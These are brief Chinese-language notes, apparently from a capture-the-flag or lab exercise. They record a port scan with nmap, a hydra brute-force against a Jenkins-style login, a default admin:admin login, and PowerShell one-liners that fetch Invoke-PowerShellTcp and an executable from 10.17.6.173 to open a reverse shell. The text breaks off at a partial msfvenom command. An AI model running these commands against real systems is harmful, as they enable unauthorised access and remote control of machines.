Rustscan寄掉了
应该是有检测
nmap -p- --min-rate=5000 -Pn 10.10.193.34
hydra爆破
j_username=admin&j_password=123456&from=%2F&Submit=Sign+in
admin:admin登录
然后用他那个工具来反弹shell
powershell iex (New-Object Net.WebClient).DownloadString('http://10.17.6.173/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.6.173 -Port 9999powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.17.6.173/shell-name.exe','shell-name.exe')"
msfveno ...